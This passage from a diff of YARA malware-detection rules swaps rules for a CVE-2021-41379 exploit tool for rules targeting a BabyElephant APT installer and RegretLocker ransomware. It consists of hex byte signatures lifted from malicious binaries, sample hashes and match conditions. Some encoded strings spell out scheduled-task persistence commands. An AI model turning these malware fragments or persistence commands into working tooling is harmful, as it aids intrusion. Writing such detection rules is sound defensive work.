48 8d 05 1d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 76 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d b2 06 45 00 00 0f 85 1a 04 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 08 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d ba ab 40 00 48 89 15 bb ab 40 00 83 3d 44 06 45 00 00 0f 1f 40 00 0f 85 97 03 00 00 48 89 05 93 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 41 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d d2 05 45 00 00 0f 85 18 03 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ab 40 00 48 89 15 fb ab 40 00 83 3d 64 05 45 00 00 0f 1f 40 00 0f 85 95 02 00 00 48 89 05 d3 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 65 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d f2 04 45 00 00 0f 85 16 02 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a aa 40 00 48 89 15 5b aa 40 00 83 3d 84 04 45 00 00 0f 1f 40 00 0f 85 90 01 00 00 48 89 05 33 aa 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 89 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 12 04 45 00 00 0f 85 11 01 00 00 48 89 05 05 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da a9 40 00 48 89 15 db a9 40 00 83 3d a4 03 45 00 00 0f 1f 40 00 0f 85 89 00 00 00 48 89 05 b3 a9 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ad 5d 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f2 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 32 03 45 00 00 } + $seq2 = { 48 c7 40 70 00 00 00 00 48 8b 48 08 48 89 0c 24 e8 01 47 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 70 e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 9b 6d ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 4a e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 75 6d ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 41 4e fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 9c 17 00 00 0f 57 c0 0f 11 84 24 18 02 00 00 0f 11 84 24 28 02 00 00 0f 11 84 24 38 02 00 00 48 8b 84 24 b8 04 00 00 48 8b 88 b0 00 00 00 48 8b 11 48 8b 59 08 48 8b 49 10 48 89 94 24 30 02 00 00 48 89 9c 24 38 02 00 00 48 89 8c 24 40 02 00 00 48 8d 8c 24 18 02 00 00 48 89 0c 24 e8 2d a2 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 90 e8 7b e0 00 00 48 8d 84 24 18 02 00 00 48 89 04 24 e8 0a a2 ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 76 4d fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 66 0f 1f 44 00 00 0f 85 ab 16 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 80 79 53 00 0f 85 a9 15 00 00 48 8b 48 18 48 8b 51 20 48 8b 0a 48 8b 9c 24 80 01 00 00 0f b7 73 40 66 89 34 24 ff d1 48 8b 44 24 08 48 89 84 24 f8 00 00 00 48 8b 4c 24 10 48 89 8c 24 38 01 00 00 48 8b 58 20 48 8b b4 24 80 01 00 00 48 8b 7e 48 4c 8b 84 24 b8 04 00 00 4d 8b 88 b0 00 00 00 4d 8b 50 08 4d 8b 58 10 48 89 0c 24 48 89 7c 24 08 4c 89 4c 24 10 4c 89 54 24 18 4c 89 5c 24 20 ff d3 48 8b 44 24 28 48 8b 4c 24 30 48 8b 5c 24 38 48 83 7c 24 30 00 0f 85 c0 14 00 00 48 85 c0 0f 84 93 00 00 00 48 89 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 7b 13 00 00 48 8b 84 24 c0 01 00 00 48 89 04 24 48 89 4c 24 08 48 89 54 24 10 48 89 5c 24 18 e8 2c df 00 00 48 8b 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 21 12 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 c6 44 24 08 16 48 89 4c 24 10 48 89 54 24 18 48 89 5c 24 20 e8 2b 4c fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 c6 11 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 90 0f 8d 0b 10 00 00 31 c9 48 89 8c 24 78 01 00 00 48 8d 05 e9 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 4e cd e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 c0 01 00 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 04 00 00 00 48 c7 44 24 18 04 00 00 00 0f 1f 00 e8 5b de 00 00 48 8d 05 94 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 f9 cc e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 80 01 00 00 48 89 0c 24 c6 44 24 08 16 48 89 44 24 10 48 c7 44 24 18 04 00 00 00 48 c7 44 24 20 04 00 00 00 e8 44 4b fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 1f 0f 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 66 90 e8 bb 43 fe ff 48 8b 44 24 10 48 8b 4c 24 18 48 83 7c 24 10 00 0f 85 d6 0e 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 e8 34 4c fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 10 48 8b 5c 24 10 48 8b 74 24 08 48 8b 7c 24 08 48 83 7c 24 18 00 0f 85 7b 0e 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 0f 8c 55 0e 00 00 48 8d 0d e9 3f 26 00 66 0f 1f 84 00 00 00 00 00 48 39 cf 0f 85 30 0e 00 00 48 89 94 24 b8 01 00 00 0f 85 4f 0d 00 00 48 89 14 24 0f 1f 44 00 00 e8 db 9e ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 2a dd 00 00 48 c7 84 24 80 03 00 00 00 00 00 00 48 8d bc 24 88 03 00 00 0f 57 c0 48 8d 7f f0 66 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 de c6 e4 ff 48 8b 6d 00 48 8b 84 24 b8 01 00 00 48 8b 48 18 48 8b 50 20 48 8b 58 28 48 89 8c 24 80 03 00 00 48 89 94 24 88 03 00 00 48 89 9c 24 90 03 00 00 48 8b 8c 24 80 01 00 00 48 89 0c 24 48 8b 94 24 80 03 00 00 48 89 54 24 08 48 8d 7c 24 10 48 8d b4 24 88 03 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 ca c9 e4 ff 48 8b 6d 00 e8 43 27 00 00 48 8b 84 24 80 00 00 00 48 8b 8c 24 88 00 00 00 48 83 bc 24 80 00 00 00 00 0f 85 4a 0c 00 00 48 8b 94 24 b8 01 00 00 48 83 7a 20 00 0f 84 26 0c 00 00 48 8b 94 24 80 01 00 00 48 8b 8a 98 00 00 00 48 8b 9a 90 00 00 00 48 85 c9 0f 86 7e 13 00 00 48 8b 03 48 8b 88 a0 00 00 00 48 8b 80 a8 00 00 00 48 89 8c 24 f0 00 00 00 48 89 84 24 20 01 00 00 48 89 14 24 e8 88 4a fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 08 48 8b 5c 24 10 48 83 7c 24 18 00 0f 85 9d 0b 00 00 48 8b 84 24 f0 00 00 00 48 8b 8c 24 20 01 00 00 48 89 94 24 00 01 00 00 48 89 8c 24 20 01 00 00 48 89 84 24 f0 00 00 00 48 89 9c 24 40 01 00 00 48 8b b4 24 80 01 00 00 48 8b 7e 48 48 83 } + $seq3 = { 48 89 34 24 e8 65 6c fe ff 48 8d bc 24 f8 03 00 00 48 8d 74 24 08 48 89 6c 24 f0 48 8d 6c 24 f0 e8 2f be e4 ff 48 8b 6d 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 8b 51 58 48 8b 0a 48 89 e7 48 8d b4 24 f8 03 00 00 0f 1f 80 00 00 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f7 bd e4 ff 48 8b 6d 00 ff d1 48 8b 84 24 b0 00 00 00 48 8b 8c 24 b8 00 00 00 48 83 bc 24 b0 } condition: - uint16(0)==0x5A4D and filesize >25KB and all of ($s*) + uint16(0)==0x5a4d and filesize >100KB and 2 of ($seq*) and 7 of ($str*) } -rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_3 : CVE_2021_41379 FILE +rule ARKBIRD_SOLG_APT_Babyelephant_Installer_Feb_2021_1 : FILE { meta: - description = "Detect exploit tool using CVE-2021-41379 (variant 3)" + description = "Detect Installer from BabyElephant APT" author = "Arkbird_SOLG" - id = "c82578d6-63ca-50f6-b105-321791ec8808" - date = "2021-11-26" - modified = "2021-11-29" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_3.yara#L1-L27" + id = "c89a127d-af49-597e-927d-c9a10c90fabe" + date = "2021-02-23" + modified = "2021-02-23" + reference = "https://twitter.com/h2jazi/status/1363683531067715584" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/BabyElephant/APT_BabyElephant_Installer_Feb_2021_1.yar#L1-L21" license_url = "N/A" - logic_hash = "559c4ca0e9ac60e3dd7d5b9a8eb22d887b0b436d4e1fc528e05e7a33ecce0aa6" - score = 75 - quality = 75 - tags = "CVE-2021-41379, FILE" - hash1 = "0dcda614c0128813bf74802f0e98ffd5ec32a40f35ed42778a5ec5984b5adf47" - hash2 = "3c78e07924e1503be1f8785c23d0dd813f04211992cbd6a4955cd0e25c745735" - hash3 = "57ec6e15bcc9c79c118f97103815bd74226d4baae334142890a52fbbc5006f1b" - hash4 = "9d24383e50e61257c565e47ec073cbb2cd751b6f650f0d542b0643dbe6691b3c" - tlp = "white" - adversary = "-" + logic_hash = "7c4f2cd7e56426e42141b1f2f3a13e1daa01b1de1fe88f4bd135601234407ec9" + score = 50 + quality = 73 + tags = "FILE" + level = "experimental" + hash1 = "d55ff954abb04ec29745f7d80ea7457a862c8025a21e889f1ba44c32ba486a7e" strings: - $s1 = { 8d 0d [2] 03 00 e8 [2] ff ff 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 ff 15 [2] 03 00 3d 24 } - $s2 = { 33 d2 48 8b 4d 08 ff 15 [2] 03 00 c7 45 24 00 00 00 00 48 8d 55 24 48 8b 4d 08 ff 15 [2] 03 00 48 8b 4d 08 ff 15 [2] 03 00 ff 15 [2] 03 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [2] 03 00 48 89 45 48 48 c7 45 68 00 00 00 00 4c 8d 45 68 ba ff 01 0f 00 48 8b 4d 48 ff 15 [2] 03 00 48 8b 4d 48 ff 15 [2] 03 00 48 c7 85 88 00 00 00 00 00 00 00 48 8d 85 88 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 41 b9 02 00 00 00 45 33 c0 ba ff 01 0f 00 48 8b 4d 68 ff 15 [2] 03 00 48 8b 4d 68 ff 15 [2] 03 00 41 b9 04 00 00 00 4c 8d 45 24 ba 0c 00 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 8b f8 33 c0 b9 18 00 00 00 f3 aa 48 8d 85 e0 00 00 00 48 8b f8 33 c0 b9 68 00 00 00 f3 aa c7 85 e0 00 00 00 68 00 00 00 b8 05 00 00 00 66 89 85 20 01 00 00 48 8d 05 [2] 02 00 48 89 85 f0 00 00 00 41 b8 04 01 00 00 48 8d 95 70 01 00 00 48 8d 0d [2] 02 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 89 44 24 50 48 8d 85 e0 00 00 00 48 89 44 24 48 48 c7 44 24 40 00 00 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 10 00 00 00 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 45 33 c9 45 33 c0 48 8d 95 70 01 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d a8 00 00 00 ff 15 [2] 03 00 48 8b 8d b0 00 00 00 ff 15 [2] 03 00 } - $s3 = { 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 48 8b 4d 08 ff 15 [2] 03 00 48 c7 45 48 00 00 00 00 c7 45 64 00 00 00 00 4c 8d 4d 64 45 33 c0 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 8b 45 64 48 89 85 88 04 00 00 ff 15 [2] 03 00 48 8b 8d 88 04 00 00 4c 8b c1 ba 0c 00 00 00 48 8b c8 ff 15 [2] 03 00 48 89 45 48 4c 8d 4d 64 44 8b 45 64 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 48 8b 45 48 4c 8b 40 10 ba 04 01 00 00 48 8d 8d 90 00 00 00 ff 15 [2] 03 00 ff 15 [2] 03 00 4c 8b 45 48 33 d2 48 8b c8 ff 15 [2] 03 00 48 8b 4d 28 ff 15 [2] 03 00 c7 85 b4 02 00 00 01 00 00 00 c7 85 d4 02 00 00 00 00 00 } - $s4 = { 68 00 00 00 80 6a 00 6a 00 ff 15 24 f0 43 00 3b f4 e8 bf 5b ff ff 89 45 f8 8b f4 6a 01 68 34 84 43 00 8b 45 f8 50 ff 15 20 f0 43 00 3b f4 e8 a2 5b ff ff 89 45 ec 8b f4 ff 15 2c f1 43 00 3b f4 e8 90 5b ff ff 3d 24 } - $s5 = { f3 ab a1 0c d0 43 00 33 c5 89 45 fc b9 d9 10 44 00 e8 55 9c ff ff 8b 45 08 89 45 f4 b9 0c 00 00 00 be a4 7e 43 00 8d bd ec f7 ff ff f3 a5 68 d0 07 00 00 6a 00 8d 85 1c f8 ff ff 50 e8 bd 95 ff } - $s6 = { 8b f4 6a 00 8b 45 f4 50 ff 15 88 f0 43 00 3b f4 e8 8d 67 ff ff c7 45 e8 00 00 00 00 8b f4 8d 45 e8 50 8b 4d f4 51 ff 15 c8 f0 43 00 3b f4 e8 6f 67 ff ff 8b f4 8b 45 f4 50 ff 15 30 f1 43 00 3b f4 e8 5c 67 ff ff 8b f4 ff 15 a4 f0 43 00 3b f4 e8 4d 67 ff ff 8b f4 50 6a 00 68 00 10 10 00 ff 15 b8 f0 43 00 3b f4 e8 36 67 ff ff 89 45 dc c7 45 d0 00 00 00 00 8b f4 8d 45 d0 50 68 ff 01 0f 00 8b 4d dc 51 ff 15 3c f0 43 00 3b f4 e8 10 67 ff ff 8b f4 8b 45 dc 50 ff 15 30 f1 43 00 3b f4 e8 fd 66 ff ff c7 45 c4 00 00 00 00 8b f4 8d 45 c4 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 8b 4d d0 51 ff 15 38 f0 43 00 3b f4 e8 d4 66 ff ff 8b f4 8b 45 d0 50 ff 15 30 f1 43 00 3b f4 e8 c1 66 ff ff 8b f4 6a 04 8d 45 e8 50 6a 0c 8b 4d c4 51 ff 15 2c f0 43 00 3b f4 e8 a6 66 ff ff 33 c0 89 45 ac 89 45 b0 89 45 b4 89 45 b8 6a 44 6a 00 8d 85 60 ff ff ff 50 e8 36 63 ff ff 83 c4 0c c7 85 60 ff ff ff 44 00 00 00 b8 05 00 00 00 66 89 45 90 c7 85 68 ff ff ff a0 86 43 00 8b f4 68 04 01 00 00 8d 85 50 fd ff ff 50 68 c8 86 43 00 ff 15 58 f1 43 00 3b f4 e8 48 66 ff ff 8b f4 8d 45 ac 50 8d 8d } - $s7 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 b8 78 00 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 7e 4e 00 00 48 8b d9 33 d2 0f 10 0d 82 4e 00 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 7b 4e 00 00 0f 29 4c 24 30 0f 29 44 24 40 e8 da 42 00 00 4c 8b 03 48 8d 4c 24 20 ba 00 04 00 00 e8 6a f8 ff ff 33 d2 8d 4a 02 ff 15 77 4c 00 00 48 8b 4b 08 48 8d 54 24 20 ff 15 70 4c 00 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 de 34 00 00 48 81 c4 30 08 00 00 } - $s8 = { 33 d2 48 8b cb ff 15 c6 2c 00 00 83 65 00 00 48 8d 55 00 48 8b cb ff 15 85 2c 00 00 48 8b cb ff 15 1c 2d 00 00 ff 15 86 2c 00 00 33 d2 b9 00 10 10 00 44 8b c0 ff 15 46 2c 00 00 48 83 64 24 68 00 4c 8d 44 24 68 48 8b c8 ba ff 01 0f 00 48 8b d8 ff 15 82 2b 00 00 48 8b cb ff 15 e1 2c 00 00 48 8b 4c 24 68 48 8d 44 24 60 48 83 64 24 60 00 41 b9 02 00 00 00 48 89 44 24 28 45 33 c0 ba ff 01 0f 00 c7 44 24 20 01 00 00 00 ff 15 80 2b 00 00 48 8b 4c 24 68 ff 15 a5 2c 00 00 48 8b 4c 24 60 4c 8d 45 00 41 b9 04 00 00 00 41 8d 51 08 ff 15 1c 2b 00 00 33 c0 48 8d 4d 90 0f 57 c0 48 89 45 80 33 d2 0f 11 44 24 70 8d 58 68 44 8b c3 e8 5b 25 00 00 8d 43 9d 89 5d 90 66 89 45 d0 48 8d 55 10 48 8d 05 e0 33 00 00 41 b8 04 01 00 00 48 8d 0d f3 33 00 00 48 89 45 a0 ff 15 91 2c 00 00 48 8b 4c 24 60 48 8d 44 24 70 48 89 44 24 50 48 8d 55 10 48 8d 45 90 45 33 c9 48 89 44 24 48 45 33 c0 48 83 64 24 40 00 48 83 64 24 38 00 c7 44 24 30 10 00 00 00 83 64 24 28 00 48 83 64 24 20 00 ff 15 9a 2a 00 00 48 8b 4c 24 60 ff 15 ef 2b 00 00 48 8b 4c 24 70 ff 15 e4 2b 00 00 48 8b 4c 24 78 ff 15 d9 } - $s9 = { 33 d2 33 c9 41 b8 00 00 00 80 ff 15 ba 33 00 00 41 b8 01 00 00 00 48 8d 15 7d 3b 00 00 48 8b c8 48 8b d8 ff 15 d9 33 00 00 48 8b cb 48 8b f8 ff 15 8d 33 00 00 4c 8d 4c 24 20 89 74 24 20 45 33 c0 33 d2 48 8b cf ff 15 ae 33 00 00 8b 5c 24 20 ff 15 64 34 00 00 44 8b c3 ba 0c 00 00 00 48 8b c8 ff 15 33 34 00 00 44 8b 44 24 20 4c 8d 4c 24 20 48 8b d0 48 8b cf 48 8b d8 ff 15 7a 33 00 00 4c 8b 43 10 48 8d 4c 24 30 ba 04 01 00 00 ff 15 46 37 00 00 ff 15 20 34 00 00 4c 8b c3 33 d2 48 8b c8 ff 15 9a 33 00 00 48 8b cf ff 15 11 33 00 00 48 8d 4c 24 30 8b fe ff 15 a4 33 00 00 83 e8 02 } + $s1 = { 65 63 68 6f 20 25 64 20 3e 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c } + $s2 = "COMSPEC" fullword ascii + $s3 = { 53 43 48 54 41 53 4b 53 20 2f 43 52 45 41 54 45 20 2f 53 43 20 4d 49 4e 55 54 45 20 2f 4d 4f 20 [1-3] 20 2f 54 4e 20 22 [1-12] 22 20 2f 54 52 20 22 [4-24] 22 20 2f 66 } + $s4 = "%s//%s" fullword ascii + $s5 = { 53 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 54 4e 20 22 [1-12] 22 20 2f 66 } + $s6 = { 83 c4 10 8b d8 e8 13 02 00 00 83 fb ff 74 06 89 38 8b f3 eb 34 83 38 02 74 0f e8 fe 01 00 00 83 38 0d 74 05 83 ce ff eb 20 e8 ef 01 00 00 89 38 56 8d 45 ec b9 c4 3e 42 00 50 51 56 89 4d ec } + $s7 = { 68 00 08 00 00 8d 85 48 f6 ff ff 6a 00 50 e8 00 33 00 00 83 c4 0c 8d 85 48 f6 ff ff 6a 00 68 00 08 00 00 50 53 ff d6 85 c0 0f 8e 1f 03 00 00 0f 1f 40 00 6a 08 68 e0 b3 42 00 8d 8d 28 ec ff ff c7 85 38 ec ff ff 00 00 00 00 c7 85 3c ec ff ff 0f 00 00 00 c6 85 28 ec ff ff 00 e8 a3 09 00 00 8d 95 28 ec ff ff c7 45 fc 00 00 00 00 8d 8d 10 ec ff ff e8 2b 05 00 00 83 } condition: - uint16(0)==0x5A4D and filesize >25KB and 3 of ($s*) + uint16(0)==0x5a4d and filesize >80KB and all of them } -rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_2 : CVE_2021_41379 FILE +rule ARKBIRD_SOLG_Ran_Regretlocker_Oct_2020_1 : FILE { meta: - description = "Detect exploit tool using CVE-2021-41379 (variant 2)" + description = "Detect RegretLocker ransomware" author = "Arkbird_SOLG" - id = "29fe9a9c-5180-55c8-882b-ad18981dc011" - date = "2021-11-26" - modified = "2021-11-29" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_2.yara#L1-L22" + id = "a8d58402-15e2-5d20-8d33-2e7a3f8973fd" + date = "2020-11-04" + modified = "2020-11-04" + reference = "https://twitter.com/VK_Intel/status/1323693700371914753" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-04/RegretLocker/Ran_RegretLocker_Oct_2020_1.yar#L1-L24" license_url = "N/A" - logic_hash = "28b1d0d6c0ee14cd46b12763692f4f76020cd5ad74bb2b39b61f493b98486068" + logic_hash = "2c63bdcee6f2a9025d3a1f73f3a38ec58da103752b88bd3a6bf79d85d8f92e4d" score = 75 quality = 75 - tags = "CVE-2021-41379, FILE" - hash1 = "13fe508e7efb50378eb8e0225221283756bf482d51be7837f850ef2b7f3281f0" - hash2 = "402722d95d468ddef049e1079c882bb9a316841b9695a15783fc23bbd3b33aed" - hash3 = "d025564e6dc872cff32f2295e0b5a2d8e3a21fbef1957facb69a493fa8a995fb" - hash4 = "dc65cd6311fd764a89d0761932bef61a89fd979510bd9ff23cde8c001de316b8" - tlp = "white" - adversary = "-" + tags = "FILE" + hash1 = "a188e147ba147455ce5e3a6eb8ac1a46bdd58588de7af53d4ad542c6986491f4" strings: - $s1 = { 4c 89 6c 24 38 44 89 6c 24 30 44 89 6c 24 28 44 89 6c 24 20 [1-2] 01 00 00 00 ?? 8b ?? 45 33 c0 ba 03 00 08 00 48 8d 0d [3] 00 ff 15 [3] 00 48 8b d8 48 83 f8 ff 0f 84 ?? 01 00 00 33 d2 48 8b c8 ff 15 [3] 00 44 89 6d 10 48 8d 55 10 48 8b cb ff 15 [3] 00 48 8b cb ff 15 [3] 00 ff 15 [3] 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [3] 00 48 8b d8 4c 89 } - $s2 = { 4c 89 6c 24 30 c7 44 24 28 80 00 00 04 c7 44 24 20 04 00 00 00 45 33 c9 [1-2] 01 00 00 00 ?? 8b ?? ba 00 00 01 80 48 8d 4d 20 ff 15 [3] 00 48 89 05 [3] 00 44 89 6d 14 48 8d 45 14 48 89 44 24 28 44 89 6c 24 20 45 33 c9 4c 8d 05 [2] ff ff 33 d2 33 c9 ff 15 [3] 00 48 8b d8 ?? 8b ?? ba 04 01 00 00 49 8d ?? 10 02 00 00 [4] 00 } - $s3 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 [3] 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 [3] 00 48 8b d9 33 d2 0f 10 0d [3] 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 [3] 00 0f 29 4c 24 30 0f 29 44 24 40 e8 [2] 00 00 4c 8b 0b 48 8d 44 24 20 41 b8 00 04 00 00 41 8b c8 66 83 38 00 74 0a 48 83 c0 02 48 83 e9 01 75 f0 45 33 d2 49 8b c0 48 2b c1 48 85 c9 49 0f 44 c2 74 47 4c 2b c0 48 8d 44 44 20 74 2e b9 fe ff ff 7f 4c 2b c8 0f 1f 80 00 00 00 00 48 85 c9 74 1a 41 0f b7 14 01 66 85 d2 74 10 66 89 10 48 ff c9 48 83 c0 02 49 83 e8 01 75 e1 4d 85 c0 48 8d 50 fe 48 0f 45 d0 66 44 89 12 33 d2 8d 4a 02 ff 15 [3] 00 48 8b 4b 08 48 8d 54 24 20 ff 15 [3] 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 [2] 00 00 48 81 c4 30 08 00 00 5b } - $s4 = { 48 8b c8 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8b c8 41 b8 04 01 00 00 48 8d 95 30 02 00 00 ff 15 [3] 00 e8 [2] ff ff 48 8b d0 45 33 c0 48 8d 8d 30 02 00 00 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8d } + $seq1 = { b8 05 dd 44 00 e8 07 7d 00 00 81 ec b0 06 00 00 53 56 33 db c7 45 cc 07 00 00 00 33 c0 89 5d c8 57 66 89 45 b8 40 c7 85 7c ff ff ff 02 00 00 00 c7 45 e0 ec 4a 98 ec 8d 75 e0 c7 45 e4 f9 a0 e9 47 8d 7d 80 c7 45 e8 90 1f 71 41 c7 45 ec 5a 66 34 5b 89 45 90 89 45 b0 89 45 b4 8d 45 d0 50 a5 8d 45 b0 50 53 68 00 00 3f 00 ff 75 0c a5 8d 85 7c ff ff ff 50 89 5d fc a5 a5 e8 76 50 00 00 85 c0 74 32 ff 15 74 00 45 00 50 68 88 1b 45 00 e8 ab de ff ff 8b 75 08 8d 45 b8 59 59 88 5d f0 8b ce ff 75 f0 89 5e 10 50 89 5e 14 e8 bb 50 ff ff e9 cb 01 00 00 53 8d 45 90 50 53 6a 04 53 ff 75 d0 e8 35 50 00 00 85 c0 74 08 50 68 bc 1b 45 00 eb bd 33 c0 8d bd 4c fb ff ff b9 82 00 00 00 be 04 01 00 00 f3 ab 8d 85 4c fb 